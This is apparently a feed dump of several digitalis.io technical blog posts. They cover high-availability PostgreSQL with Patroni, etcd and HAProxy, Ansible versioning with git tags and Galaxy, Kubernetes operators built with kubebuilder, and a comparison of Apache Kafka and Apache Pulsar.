This example configuration enables the HAProxy statistics on port 7000. The region_one section is named after the patroni scope for consistency and listens on the port 5432. Each patroni server is listed as a server to be checked on port 8008, the REST api port, to determine whether the node is up.
After configuring and starting HAProxy on each node we will be able to connect to any of the nodes and always end up on the primary. In case of failover the connection will drop, and at the next connection attempt we'll connect to the new primary.
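A quick way to verify this behaviour is to connect through any node and ask PostgreSQL whether it is a replica; pg_is_in_recovery() returns false only on the primary:
$ psql -h patroni01 -p 5432 -U postgres -c "SELECT pg_is_in_recovery();"
 pg_is_in_recovery
-------------------
 f
(1 row)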
This simple example shows how to set up a three node Patroni cluster with no single point of failure (SPOF). To do this we have etcd configured as a cluster with a member installed on each database node. In a similar fashion we have HAProxy installed and running on each database node.
However, for production it would be recommended to set up etcd on dedicated hosts and to configure SSL for etcd and the Patroni REST APIs, if the network is not trusted or to avoid accidents.
Additionally, for HAProxy in production it is strongly suggested to have a load balancer capable of checking whether the HAProxy service is available before attempting a connection.
Getting a Patroni cluster up and running requires a lot of configuration. It is therefore strongly recommended to use a configuration management tool such as Ansible to deploy and configure your cluster.
If you would like to know more about how to implement modern data and cloud technologies, such as PostgreSQL, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us for more information.
The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 2 appeared first on digitalis.io.
]]>The post Ansible Versioning appeared first on digitalis.io.
]]>If you are reading this blog you probably know what Ansible is but in case this is new to you, let me give you a brief introduction.
In the past servers were installed and configured manually. This was quite tedious but OK when there were only a few servers to manage. Nowadays, however, the number and complexity of the servers under management in the average company has increased exponentially. Even more so when we talk about Infrastructure as Code, where servers are transient.
Also doing things manually often leads to errors and discrepancies between configurations and servers.
That is how automation came to be. There are multiple options these days; probably the most widely used are Puppet, Chef and Ansible. All three allow us to manage the configuration of multiple servers in a way that is repeatable, to ensure all servers have the same settings and that any new server we add into the mix will be identical to the others.
However, the orchestration software is only going to be as good as the version and code management. If you do not keep track of the changes you're making to (in our case) the Ansible code, you will eventually have different configurations on servers and unrepeatable infrastructure.
- hosts: all
  vars:
    env: production
  vars_files:
    - "vars/{{ env }}.yml"
  tasks:
    - name: Install nginx
      package:
        name: nginx
        state: present
The above example is a very simple playbook for installing nginx, which reads the environment parameters from a file imported at runtime based on the env variable.
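For instance, deploying the same playbook against a hypothetical staging environment (assuming a vars/staging.yml exists, and using site.yml as an illustrative playbook name) only requires overriding the variable at runtime:
$ ansible-playbook site.yml -e env=staging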
The most common way of keeping track of your changes to Ansible is using version control, and the best version control software at the moment is git. People starting out with git find it slightly daunting to begin with, but it is pretty powerful and used around the world.
By keeping your Ansible code in a git repository you will be able to track changes to the code. If you’re working on a project with little collaboration it is easy to fall into the temptation of committing all your changes straight into the master branch. After all, it’s just you and you know what you have done, right?
It may well be you have a fantastic memory and you are able to keep track, but once multiple people start working on the same repository you will very quickly lose sight of what changed. Furthermore, your configuration changes will no longer be repeatable. You cannot (easily) go back to the code you created two months ago and use it to set up a server. See the use case below:
Let’s have a look at a use case and see what would happen depending on whether you are using versioned code or not (a bit more on versioning in the next section).
You have 10 servers in development and 20 in production. Your production servers have been running for the last year with no issues and very few updates. In the meantime you’ve been working on a new feature and testing it in the development servers.
Suddenly you’re in urgent need of building 5 more servers in production:
As you can see, having a versioned deployment would have helped in this case. This is a very simplistic way of explaining it, but you can probably see how much of an advantage it is to use versions. Knowing what's on each of your environments, as opposed to thinking you know, will add a large amount of peace of mind to your daily work.
Companies and individuals may take different approaches at versioning the git repositories. At the core of our version control we use branches and tags. We use branches to separate the work stream between individuals or projects and tags to mark a fixed point in time, for example, project end.
A branch is simply a fork of your code you keep separated from the main branch (usually called master) where you can record your changes until they are ready for mainstream use, at which point you would merge them with the master branch.
A tag by contrast is a fixed point in time. Tags are immutable. Once created they have no further history or commits.
We allow deployments into development from git branches but we don’t allow deployments into the rest of the environments other than from tags (known versions).
We prefer to use tags in the format MAJOR.MINOR.HOTFIX (i.e. 1.1.0). This type of versioning is called semantic versioning.
Major – should only change when the release is materially different to the previous version or includes backward incompatible changes.
Minor – a progression over the last version, such as a new feature or an improvement over existing ones.
Hotfix – applies a correction to the existing repository without carrying forward new code.
I’m not going to explain how to create tags but I will go into some detail on how we manage hot fixes as this is quite different between companies. In this scenario we have a product called productX and we’re running version 2.0.0 on production.
We have confirmed there is a bug and we need to update a single parameter in our Ansible code. If we take the current code in our repository and tag it as 2.13.0, which would be the next logical version number, we will be taking with us all changes between that version and the HEAD of the git repository, many of which have never gone through testing. What we do instead is create a tag using the current production version as a base. That way the new version will be identical to the production version except for the fix we just introduced.
[(master)]$ git checkout -b hotfix/2.0.1 2.0.0
Switched to a new branch 'hotfix/2.0.1'
[(hotfix/2.0.1)]$ echo hotfix > README.md
[(hotfix/2.0.1)]$ git commit -am 'hotfix: fixing something broken'
[hotfix/2.0.1 3cda6d4] hotfix: fixing something broken
1 file changed, 1 insertion(+)
[(hotfix/2.0.1)]$ git push -u origin hotfix/2.0.1
Counting objects: 3, done.
Writing objects: 100% (3/3), 258 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
To git@localhost:sample-repo.git
* [new branch] hotfix/2.0.1 -> hotfix/2.0.1
Branch hotfix/2.0.1 set up to track remote branch hotfix/2.0.1 from origin.
[(hotfix/2.0.1)]$ git tag 2.0.1
[(hotfix/2.0.1)]$ git push --tags
Counting objects: 1, done.
Writing objects: 100% (1/1), 156 bytes | 0 bytes/s, done.
Total 1 (delta 0), reused 0 (delta 0)
To git@localhost:sample-repo.git
* [new tag] 2.0.1 -> 2.0.1
Before we can talk about versioning our code, let's take it apart. There are three areas where we do versioning separately: the roles, the product playbooks and the environment configuration.
When making changes to Ansible code you will most likely be updating one or more of the above resources. We therefore need to keep track of everything keeping in mind that some areas like the roles are shared between deployments.
We separated the roles from the rest of the playbook. Each role is a git repository in its own right with a git tag for versioning. And we use ansible-galaxy at runtime to download the required versions every time the playbook is run.
Ansible Galaxy uses a simple yaml configuration file to list all the roles. Whilst you can use Ansible Tower or AWX, this is not required. This is the preferred approach as it decreases the complexity and the number of servers we need to support.
- src: [email protected]:mygroup/ansible-role-nginx.git
  scm: git
  version: "1.0.0"
- src: [email protected]:mygroup/ansible-role-apache.git
  scm: git
  version: "1.3.0"
- src: [email protected]:mygroup/ansible-role-cassandra.git
  scm: git
  version: "feature/AAABBB"
Versions can be either a branch name or a tag. This adds the flexibility to test new features in the development environment without the need to update the requirements.yml file every time with a new tag.
Each of your roles will also need to be configured for Galaxy. Each needs an additional file, meta/main.yml, with a format like:
---
galaxy_info:
  author: Sergio Rua <[email protected]>
  description: Digitalis Role for Blog
  company: Digitalis.IO
  license: Apache License 2.0
  min_ansible_version: 2.9
  platforms:
    - name: RedHat
      versions:
        - all
    - name: Debian
      versions:
        - all
  galaxy_tags:
    - digitalis
    - blog
dependencies: []
If your role requires another one to run (dependent), you can add them to the dependencies section. You can also use SCM here for downloading the roles, though I would not recommend this as it will clash with the config in requirements.yml and you will end up having to maintain two different configurations.
dependencies:
  - role: foo
    src: [email protected]:MyOrg/ansible-foo
    scm: git
    version: 0.1.0
The screenshot below represents a sample deployment, which we refer to as a product. You may have noticed there are no roles defined in this directory. We have the different variables, the tasks and finally the requirements.yml. As explained above, we keep the roles in their own git repositories and we include them with Ansible Galaxy on demand.
The product git repository is tagged every time any of the files it contains changes (except during development when we use branches) and this becomes the version we control to keep track of changes into our different environments.
We now have the two main components joined up.
As you can see in the diagram below, we have one single version for the whole product, which in turn contains all the roles with their versions. Whenever we make a change we will always need to update the product repository, and therefore a new version (tag) is created.
The best way in this scenario is either to have one playbook git repository per environment (the preferred option) or to have a single repository shared by all environments.
Be aware that multiple repositories are probably a good idea for large deployments, but it can be quite painful to keep environments in sync. Many times I have seen the versions between environments become very different, and unfortunately there is no magic pill to fix this other than to ensure there are good practices and that the whole team follows them. Automation is key.
When using Ansible with Ansible Galaxy for role management there is an extra step before you can run the playbook which is downloading all roles referenced in the requirements.yml. This is done using the ansible-galaxy command:
ansible-galaxy install -r requirements.yml
There are a couple of additional options worth mentioning:
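Two commonly used ones are --force, which re-downloads roles even when a version is already installed locally (useful when a branch has moved on), and --roles-path, which controls the directory the roles are installed into; for example:
ansible-galaxy install -r requirements.yml --force --roles-path ./roles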
We prefer to automate as much as we can, including running Ansible itself, and we don't encourage manual intervention. What I mean is we try not to log into servers whenever possible, and instead use centralised tools such as Jenkins and Rundeck to run any command on the servers.
There are many advantages to automation tools such as Jenkins and Rundeck. To list a few: every run is logged and auditable, access to the servers can be centralised and controlled, and jobs can be scheduled and run consistently every time.
Pretty much everyone is reluctant to introduce versioning into their code. After all, commit to master and run Ansible, what's the worst that could happen? The worst will happen; it is only a matter of time. The good news is that implementing good DevOps principles is easy, and once you build your automation around them it becomes easy to manage.
The next time you need to rollback your code you will be grateful you can do so without having to cherry pick your last 100 git commits.
Be safe.
If you would like to know more about how to implement modern data and cloud technologies into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
Senior DevOps Engineer
Sergio gained many years of experience working on various development projects before joining Digitalis. He worked for large companies with complex networks and infrastructure. This has helped Sergio gain lots of experience in multiple areas, from programming to networks. He especially excels in DevOps: automation is his day-to-day and Kubernetes his passion.
The post Ansible Versioning appeared first on digitalis.io.
]]>The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 1 appeared first on digitalis.io.
]]>In the first of a series of blogs on deploying PostgreSQL for High Availability (HA), we show how this can be done by leveraging technologies such as Patroni, etcd and HAProxy.
This blog gives an introduction to the relevant technologies and starts with showing how to deploy etcd as the distributed configuration store that Patroni will subsequently use for HA. Subsequent blogs will show how to configure Patroni, HAProxy and PostgreSQL
The second part of this blog can be found here.
For demonstration purposes the examples show how to manually install and configure the relevant components. However, it is highly recommended to follow standard DevOps practices and use a configuration management tool such as Ansible to install and configure the various software packages and the OS.
If you would like to know more about how to implement modern data and cloud technologies, such as PostgreSQL, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us today for more information.
Patroni is an automatic failover system for PostgreSQL built by Zalando. It provides automatic or manual failover and keeps all of the vital data stored into a distributed configuration store (DCS) that can be one of etcd, zookeeper, consul or a pure python RAFT implementation based on the library pysyncobj. Patroni is available either as a pip package or via the official RPM/DEB PostgreSQL repositories.
When Patroni runs on top of the primary node it stores a token in the DCS. The token has a limited TTL, measured in seconds. If the primary node becomes unavailable the token expires, and patroni on the followers initiates, via the DCS, the election of a new primary.
When the old primary comes back online it discovers that the token is held by another node, and patroni transforms the old primary into a follower of the new primary automatically.
Database connections do not happen directly to the database nodes but are routed via a connection proxy like HAProxy or pgbouncer. This proxy, by querying the patroni REST API, determines the active node.
It’s then clear that by using Patroni the risk of having a split brain scenario is very limited.
However, by using patroni a DBA needs to completely surrender manual database administration to patroni, because all the dynamic settings are stored in the DCS in order to have complete consistency across the participating nodes.
In this blog post we'll see how to build a Patroni cluster on top of CentOS 7, using a clustered etcd and with HAProxy active on each database node, capable of routing database connections automatically to the primary whichever node we decide to connect to.
In order to set up PostgreSQL and Patroni we need to add the official pgdg (PostgreSQL Global Development Group) yum repository to CentOS.
The PostgreSQL website has an easy to use wizard to grab the commands depending on the distribution in use at the url https://www.postgresql.org/download/linux/redhat/ .
For CentOS 7, adding the yum repository is as simple as this.
sudo yum install -y https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm
We can now install the PostgreSQL 13 binaries by running the following command.
sudo yum install -y postgresql13-server postgresql13 postgresql13-contrib
In order to use the packaged version of patroni we need to install epel-release, which provides additional packages required by patroni
sudo yum install -y epel-release
Finally we can install the remaining components we need: patroni, etcd and haproxy.
The CentOS base installation ships with firewalld and selinux enabled; both need to be adjusted before configuring our Patroni cluster.
For firewalld we need to open the ports required by etcd, PostgreSQL, HAProxy and the Patroni REST API.
For selinux we need to enable the flag that allows HAProxy to bind to the ip addresses.
The ports required for operating patroni/etcd/haproxy/postgresql are the following: 5432 (PostgreSQL via HAProxy), 6432 (PostgreSQL), 2379 and 2380 (etcd client and peer traffic), 8008 (the patroni REST API) and 7000 (HAProxy statistics).
Enabling the ports is very simple and can be automated via script or ansible using the firewalld module.
By using bash it is possible to enable the ports with a simple for loop.
for service_port in 5432 6432 2380 2379 8008 7000
do
sudo firewall-cmd --permanent --zone=public --add-port=${service_port}/tcp
done
sudo systemctl reload firewalld
By default selinux prevents new services from binding to all the ip addresses.
In order to allow HAProxy to bind to the ports required for its functionality we need to run this command.
sudo setsebool -P haproxy_connect_any=1
For our example we are using three virtualbox virtual machines. Each machine has two network interfaces. The first interface is bridged to the host network adapter and is used for internet access. The second interface is connected to the host-only network provided by virtualbox and is used for intercommunication between the machines.
The second interface is configured with a static ip address, and each node has its hosts file configured so the other hosts' ip addresses resolve to machine names.
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
192.168.56.40 patroni01
192.168.56.41 patroni02
192.168.56.42 patroni03
We are now ready to configure etcd to work as a cluster of three nodes.
To do so we need to edit the file /etc/etcd/etcd.conf and modify the following variables.
ETCD_LISTEN_PEER_URLS="http://192.168.56.40:2380"
ETCD_LISTEN_CLIENT_URLS="http://192.168.56.40:2379"
ETCD_NAME="patroni01"
ETCD_INITIAL_ADVERTISE_PEER_URLS="http://192.168.56.40:2380"
ETCD_ADVERTISE_CLIENT_URLS="http://192.168.56.40:2379"
ETCD_INITIAL_CLUSTER="patroni01=http://192.168.56.40:2380,patroni02=http://192.168.56.41:2380,patroni03=http://192.168.56.42:2380"
All the variables except ETCD_INITIAL_CLUSTER are machine specific and must be set accordingly with the machine name and ip address.
The variable ETCD_INITIAL_CLUSTER is a comma separated values list of the hosts participating in the etcd cluster.
After configuring etcd on each node we can enable and start the service.
sudo systemctl enable etcd
sudo systemctl start etcd
We can check the cluster’s health status with the following command.
etcdctl --endpoints http://patroni01:2379 cluster-health
member 75e96c8926bc6382 is healthy: got healthy result from http://192.168.56.40:2379
member 7c1dfc5e13a8008a is healthy: got healthy result from http://192.168.56.42:2379
member c920522ba9a75e17 is healthy: got healthy result from http://192.168.56.41:2379
cluster is healthy
We've seen how to configure a three node etcd cluster on the patroni nodes.
In the next posts we'll see how to configure and initialise a patroni cluster using the DCS (etcd) running on the database nodes, and how to set up HAProxy to efficiently route database connections to the active leader.
The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 1 appeared first on digitalis.io.
]]>The post Kubernetes Operators pros and cons – the good, the bad and the ugly appeared first on digitalis.io.
]]>When you use Kubernetes to deploy an application, say a Deployment, you are calling the underlying Kubernetes API, which hands your request over to an application and applies the config you requested via the YAML configuration file.
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
[...]
In this example, Deployment is part of the default K8s server, but there are many other kinds you are probably using that are not and that you installed beforehand. For example, if you use a nginx ingress controller on your cluster you have installed an API (kind: Ingress) that modifies the behaviour of nginx every time you configure a new web entry point.
The role of the controller is to track a resource type until it achieves the desired state. For example, another built-in controller is the one for the Pod kind. The controller will loop over itself ensuring the Pod reaches the Running state by starting the containers configured in it. It will usually accomplish the task by calling an API server.
We can find three important parts in any controller: a watch on the resource type it manages, a queue of change events to process, and the reconcile loop that drives the current state towards the desired state.
The good
Kubernetes Operators offer a way to extend the functionality of Kubernetes beyond its basics. This is especially interesting for complex applications which require intrinsic knowledge of the functionality of the application to be installed. We saw a good example earlier with the Ingress controller. Others are databases and stateful applications.
They can also reduce the complexity and length of the configuration. If you look for example at the postgres operator by Zalando, you can see that with only a few lines you can spin up a fully featured cluster:
apiVersion: "acid.zalan.do/v1"
kind: postgresql
metadata:
  name: acid-minimal-cluster
  namespace: default
spec:
  teamId: "acid"
  volume:
    size: 1Gi
  numberOfInstances: 2
  users:
    zalando:  # database owner
      - superuser
      - createdb
    foo_user: []  # role for application foo
  databases:
    foo: zalando  # dbname: owner
  preparedDatabases:
    bar: {}
  postgresql:
    version: "13"
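Applying this manifest is no different from any other resource (a sketch, assuming the operator is already running in the cluster and the manifest is saved under the hypothetical name minimal-cluster.yaml), and the new custom resource type can then be queried like the built-in ones:
$ kubectl apply -f minimal-cluster.yaml
$ kubectl get postgresql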
The bad
The worst thing in my opinion is that it can lead to abuse and overuse.
You should only use an operator if the functionality cannot be provided by Kubernetes. K8s operators are not a way of packaging applications; they are extensions to Kubernetes. I often see community projects for K8s Operators that I would happily replace with a helm chart, in most cases a much better option.
The ugly
Extending Kubernetes with your own resource types means writing a Custom Resource Definition (CRD), and even for something as simple as a cron entry these get verbose very quickly:
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  # name must match the spec fields below, and be in the form: <plural>.<group>
  name: crontabs.stable.example.com
spec:
  # group name to use for REST API: /apis/<group>/<version>
  group: stable.example.com
  # list of versions supported by this CustomResourceDefinition
  versions:
    - name: v1
      # Each version can be enabled/disabled by Served flag.
      served: true
      # One and only one version must be marked as the storage version.
      storage: true
      schema:
        openAPIV3Schema:
          type: object
          properties:
            spec:
              type: object
              properties:
                cronSpec:
                  type: string
                image:
                  type: string
                replicas:
                  type: integer
  # either Namespaced or Cluster
  scope: Namespaced
  names:
    # plural name to be used in the URL: /apis/<group>/<version>/<plural>
    plural: crontabs
    # singular name to be used as an alias on the CLI and for display
    singular: crontab
    # kind is normally the CamelCased singular type. Your resource manifests use this.
    kind: CronTab
    # shortNames allow shorter string to match your resource on the CLI
    shortNames:
      - ct
The good news is you may never have to write these by hand. Enter kubebuilder. Kubebuilder is a framework for building Kubernetes APIs. I guess it is not dissimilar to Ruby on Rails, Django or Spring.
I took it out for a test and created my first API and controller 🎉
I have Kubernetes running on my laptop with minikube. There I installed OpenLDAP and I got to work to see if I could manage the LDAP users and groups from Kubernetes.
For my project I need to create two APIs: one for managing users and another for groups. Let's initialise the project and create the APIs:
kubebuilder init --domain digitalis.io --license apache2 --owner "Digitalis.IO"
kubebuilder create api --group ldap --version v1 --kind LdapUser
kubebuilder create api --group ldap --version v1 --kind LdapGroup
These commands create everything I need to get started. Have a good look at the directory tree, from which I would highlight these three folders:
api: contains a sub directory for each of the api versions you are writing code for. In our example you should only see v1.
config: all the yaml files required to set up the controller when installing in Kubernetes, chief among them the CRD.
controllers: the main part, where you write the code to Reconcile.
The next part is to define the API. Using kubebuilder, rather than having to edit the CRD manually, you just add your type definitions and kubebuilder will generate the CRDs for you.
If you look into the api/v1 directory you’ll find the resource type definitions for users and groups:
type LdapUserSpec struct {
    Username string `json:"username"`
    UID      string `json:"uid"`
    GID      string `json:"gid"`
    Password string `json:"password"`
    Homedir  string `json:"homedir,omitempty"`
    Shell    string `json:"shell,omitempty"`
}
For example, I have defined my users with the struct above, and the groups with:
type LdapGroupSpec struct {
    Name    string   `json:"name"`
    GID     string   `json:"gid"`
    Members []string `json:"members,omitempty"`
}
Once you have your resources defined, just run make install and it will generate and install the CRDs into your Kubernetes cluster.
The truth is kubebuilder does an excellent job. After defining my API I just needed to update the Reconcile functions with my code and voila. This function is called every time an object (a user or group in our case) is added, removed or updated. I'm not ashamed to say it took me probably 3 times longer to write the code to talk to the LDAP server.
func (r *LdapGroupReconciler) Reconcile(req ctrl.Request) (ctrl.Result, error) {
    ctx := context.Background()
    log := r.Log.WithValues("ldapgroup", req.NamespacedName)
    [...]
}
My only complication was with deleting. In my first version the controller was crashing because it could not find the object to delete, and without it I could not delete the user/group from LDAP. I found the answer in finalizers.
A finalizer is added to a resource and acts like a pre-delete hook. This way the code captures that the user has requested the user/group to be deleted, can do the deed, and then reply back saying all good, move along. Below is the relevant code, adapted from the kubebuilder book, with extra comments:
//! [finalizer]
ldapuserFinalizerName := "ldap.digitalis.io/finalizer"
// Am I being deleted?
if ldapuser.ObjectMeta.DeletionTimestamp.IsZero() {
    // No: check if I have the `finalizer` installed and install otherwise
    if !containsString(ldapuser.GetFinalizers(), ldapuserFinalizerName) {
        ldapuser.SetFinalizers(append(ldapuser.GetFinalizers(), ldapuserFinalizerName))
        if err := r.Update(context.Background(), &ldapuser); err != nil {
            return ctrl.Result{}, err
        }
    }
} else {
    // The object is being deleted
    if containsString(ldapuser.GetFinalizers(), ldapuserFinalizerName) {
        // our finalizer is present, let's delete the user
        if err := ld.LdapDeleteUser(ldapuser.Spec); err != nil {
            log.Error(err, "Error deleting from LDAP")
            return ctrl.Result{}, err
        }
        // remove our finalizer from the list and update it.
        ldapuser.SetFinalizers(removeString(ldapuser.GetFinalizers(), ldapuserFinalizerName))
        if err := r.Update(context.Background(), &ldapuser); err != nil {
            return ctrl.Result{}, err
        }
    }
    // Stop reconciliation as the item is being deleted
    return ctrl.Result{}, nil
}
//! [finalizer]
I created some test code. It's very messy; remember this is just a learning exercise and it'll break apart if you try to use it. There are also lots of duplications in the LDAP functions, but it serves a purpose.
You can find it here: https://github.com/digitalis-io/ldap-accounts-controller
This controller will talk to an LDAP server to create users and groups as defined by my CRDs. As you can see below I now have two Kinds defined, one for LDAP users and one for LDAP groups. As they are registered in Kubernetes by the CRDs, Kubernetes knows to hand them to our controller.
apiVersion: ldap.digitalis.io/v1
kind: LdapUser
metadata:
  name: user01
spec:
  username: user01
  password: myPassword!
  gid: "1000"
  uid: "1000"
  homedir: /home/user01
  shell: /bin/bash
---
apiVersion: ldap.digitalis.io/v1
kind: LdapGroup
metadata:
  name: devops
spec:
  name: devops
  gid: "1000"
  members:
    - user01
    - "90000"
The controller reads the LDAP connection settings from environment variables:
LDAP_BASE_DN="dc=digitalis,dc=io"
LDAP_BIND="cn=admin,dc=digitalis,dc=io"
LDAP_PASSWORD=xxxx
LDAP_HOSTNAME=ldap_server_ip_or_host
LDAP_PORT=389
LDAP_TLS="false"
make install run
The post Kubernetes Operators pros and cons – the good, the bad and the ugly appeared first on digitalis.io.
]]>The post Apache Kafka vs Apache Pulsar appeared first on digitalis.io.
]]>Digitalis has extensive experience in designing, building and maintaining data streaming systems across a wide variety of use cases – on premises, all cloud providers and hybrid. If you would like to know more or want to chat about how we can help you, please reach out.
When we talk about streaming data systems it's hard to ignore Apache Kafka. Its adoption has risen dramatically over the last five years and the ecosystem around it has grown too. While Kafka dominates the online talks, meetups and conference agendas, other streaming platforms do exist.
In this blog post I’m going to compare Apache Kafka and Apache Pulsar. By the end of this post you should have a good comparison of the two platforms. I will cover the core components and some of the common requirements of any streaming platform.
Both Kafka and Pulsar use a broker architecture: the brokers handle the incoming messages from producers and the delivery of messages to consumers. The difference is in how messages reach the consumers: with Kafka the messages are pulled from the brokers by the consumers, while in Pulsar it's the other way around, they are pushed to the subscribing consumers.
One of the major advantages of Pulsar over Kafka is the number of topics you can create. There are hard limits on a Kafka cluster when it comes to partitions: a limit of 4,000 partitions per broker and a total of 200,000 across the entire cluster, so there will come a time when you cannot create more topics. Pulsar doesn't suffer from this limitation; it can scale to millions of topics because the data is not stored within the brokers themselves but externally in Bookkeeper nodes.
Both systems use Apache Zookeeper for cluster coordination. Kafka, at present, uses Zookeeper for metadata on topic configuration and access control lists (ACLs), Pulsar uses Zookeeper for the same purposes.
With the KIP-500 improvement proposal the removal of Zookeeper from Kafka will happen; it's currently being tested. This means that Kafka will operate on its own, relying only on the operating brokers for all the cluster metadata. It's worth noting that Kafka can still be run in "legacy mode" if you still want Zookeeper to handle its metadata.
For me Pulsar wins the replication battle, it provides geo-replication out of the box. A replicated cluster can be created across multiple data centers. Applications can be blocked from consuming from local clusters until messages have been replicated and acknowledged.
Kafka has two methods for replication, Mirror Maker 2 or Confluent Replicator. If you are using the Apache Kafka distribution then you have Mirror Maker 2, it works well but takes time to configure. If you have purchased a Confluent licence then Replicator is available to you as a standalone application or a connector running on a Kafka Connect node.
Offset handling is incredibly difficult to achieve with replicated Kafka, with some custom API coding required in applications to read from the replicated cluster. Pulsar doesn't suffer from these problems. It's worth pointing out that multi-DC operation is coming to the Confluent Platform in the future, but it will be part of the paid-for licence.
If you have used Kafka then you will be aware of the properties configuration and the adding of bootstrap servers, broker lists or Zookeeper nodes depending on the operation you are doing. When new brokers are added then properties need amending with the new addresses appended to the configuration.
Pulsar provides a proxy layer to address the cluster with a single address. This is a huge advantage over Kafka especially when you are deploying with frameworks such as Kubernetes where direct access to the brokers is not possible. Another win is that you are allowed to run as many Pulsar proxies as you wish and they can be accessed via a single point with a load balancer. For cloud based deployments this makes managing and accessing the cluster easy.
As message frequencies increase there comes a time when you have to scale up the cluster to accommodate the volume of messages. With Kafka this means adding more brokers to the cluster, which is not an easy task; this is an area where Pulsar is far superior. With Kafka, once the broker is added to the cluster, the manual process of repartitioning and replicating the message data to the new broker begins. Depending on the message volumes this can take a lot of time.
Where Kafka uses the brokers themselves for storage, Pulsar stores messages in Apache Bookkeeper, not in the brokers. The main difference is that Pulsar separates message persistence, including unacknowledged messages and replication, from the brokers.
With Pulsar, if you want to increase message capacity then you add as many Bookkeeper instances as you require without having to add the equivalent number of brokers (as you would with Kafka).
Pulsar also provides the option to use non persistent topics in memory, with no data being written to disk. Note however, if the Pulsar broker disconnects from the cluster then those messages and non persistent topics will be lost, whether a message is stored in the broker or in transit to the consumer.
Language | Kafka Client | Pulsar Client |
C | ✔ | |
Clojure | ✔ | Using Java Interop |
C# / .Net | ✔ | ✔ |
Go | ✔ | ✔ |
Groovy | ✔ | |
Java | ✔ | ✔ |
Spring Boot | ✔ | |
Kotlin | ✔ | |
Node.js | ✔ | |
Python | ✔ | ✔ |
Ruby | ✔ | |
Rust | ✔ | |
Scala | ✔ |
While there are various Kafka client libraries available, it's worth taking the time to study the Kafka features they support; not all aspects of the Kafka APIs are covered in the client libraries. For example, if you want to use Kafka's Streams API, only Java covers it.
One of the interesting bonuses of the Pulsar Java client libraries is that they drop into existing Kafka producer and consumer code. The only thing that you need to do is update the client dependency in Maven. This gives you an excellent way to evaluate Pulsar without having to refactor all your code.
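As a sketch, the swap amounts to replacing the kafka-clients dependency with Pulsar's Kafka compatibility wrapper (the version shown is illustrative; pick the one matching your Pulsar cluster):
<dependency>
  <groupId>org.apache.pulsar</groupId>
  <artifactId>pulsar-client-kafka</artifactId>
  <version>2.7.0</version>
</dependency>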
There are some differences between Pulsar and Kafka when it comes to reading messages. Kafka is an immutable log, with the offset controlling which message the consumer reads next. If you don't want to get into the detail of committing your own offsets then you can let the Kafka client API do that for you.
With Pulsar you have a choice of two consuming methods: a consumer, where the brokers track your read position through a named subscription and messages are acknowledged back; or a reader, where your application takes control of exactly where in the topic it starts reading from.
For anyone who remembers writing producers and consumers that handled database data, it was a difficult process and difficult to scale.
Within Kafka the Kafka Connect system provided a convenient method of either sourcing data to topics or persisting data to a sink.
Apache Pulsar has a similar method called Pulsar IO. It has the same source/sink method of acquiring data or persisting it. The disadvantage here is the support for those external systems.
Some external systems, such as Apache Cassandra, are supported by both. If it's JDBC operations that you want to do, once again both are supported well. Other open source systems like Flume, Debezium, Hadoop HDFS, Solr and ElasticSearch are also supported by both. However, there are far more supported vendors for Kafka Connect than there are for Pulsar IO, and while you can write your own plugins it is far easier to use an off the shelf one. In terms of connector availability Kafka Connect is an easy choice.
Please note that not all connectors for Kafka are free, some of them you will have to purchase with a licence from Confluent (the commercial arm of Kafka).
If the ease of availability and implementation is important to you then the Kafka connector support is far superior to the Pulsar option.
Using SQL like queries on message streams can speed up the development of basic applications and bypassing any code development being required. These SQL engines also make the use of aggregating data (counting frequencies of certain keys, averages and so on) very easy.
There are SQL engines for both Kafka and Pulsar. The Kafka KSQL engine is a standalone product produced by Confluent and does not come with the Apache Kafka binaries. It is licenced under the Confluent Community Licence.
Apache Pulsar uses the Presto SQL engine to query messages, with their schema stored in its schema registry. Messages are required to be ingested first and then queried, whereas KSQL streams the data in the same way a continuously running Streams API application would, applying the queries as data arrives.
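For example, with a Pulsar cluster running you can start a Presto worker and query a topic directly; a sketch, assuming a hypothetical topic mytopic in the default namespace:
$ bin/pulsar sql-worker run
$ bin/pulsar sql
presto> select * from pulsar."public/default"."mytopic";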
While there are a few issues with KSQL once you go beyond the basics, I prefer it over Pulsar’s read and then query mechanism.
The ability to store old data beyond the retention period of the brokers is one that’s often overlooked. It has become more important as machine learning is being used on the data for recommendation systems, or replaying the data as a system of a record.
Before Kafka Connect it was common for developers to write their own streaming jobs to persist to the likes of Amazon S3 or other types of storage buckets. Tiered storage appeared in Kafka only recently and is only available in the Confluent Platform from 6.0.0 onwards as a paid-for option. Persistence is to Amazon S3, Google Cloud Storage or Pure Storage FlashBlade.
Pulsar offers tiered storage as part of the open source distribution, using the Apache jclouds framework to store data to Amazon S3 or Google Cloud Storage, with other vendors planned for the future. The fact that tiered storage is available for free and out of the box is a huge advantage for Pulsar over Kafka.
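Once an offload driver and bucket are configured, offloading can also be triggered manually per topic; a sketch with a hypothetical topic name:
$ bin/pulsar-admin topics offload --size-threshold 10M persistent://public/default/mytopic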
While comparing the feature and technological aspects of Kafka and Pulsar, to me the biggest differentiator is the community support. Everyone has questions and everyone looks for help at some point, and it's something the Kafka community has managed to excel at; the time investment has certainly paid off.
The support in the Confluent Slack channels is excellent (if you’re not a member and you’re using Kafka, I strongly suggest you join). There are lots of meetups available online covering various aspects of the Kafka ecosystem, there is plenty going on.
Unfortunately Pulsar still has a small (but growing) community, so it can be difficult to find answers. The Kafka community support wins hands down. If Pulsar is to compete with Kafka going forward then this is the area I feel it needs to focus on the most.
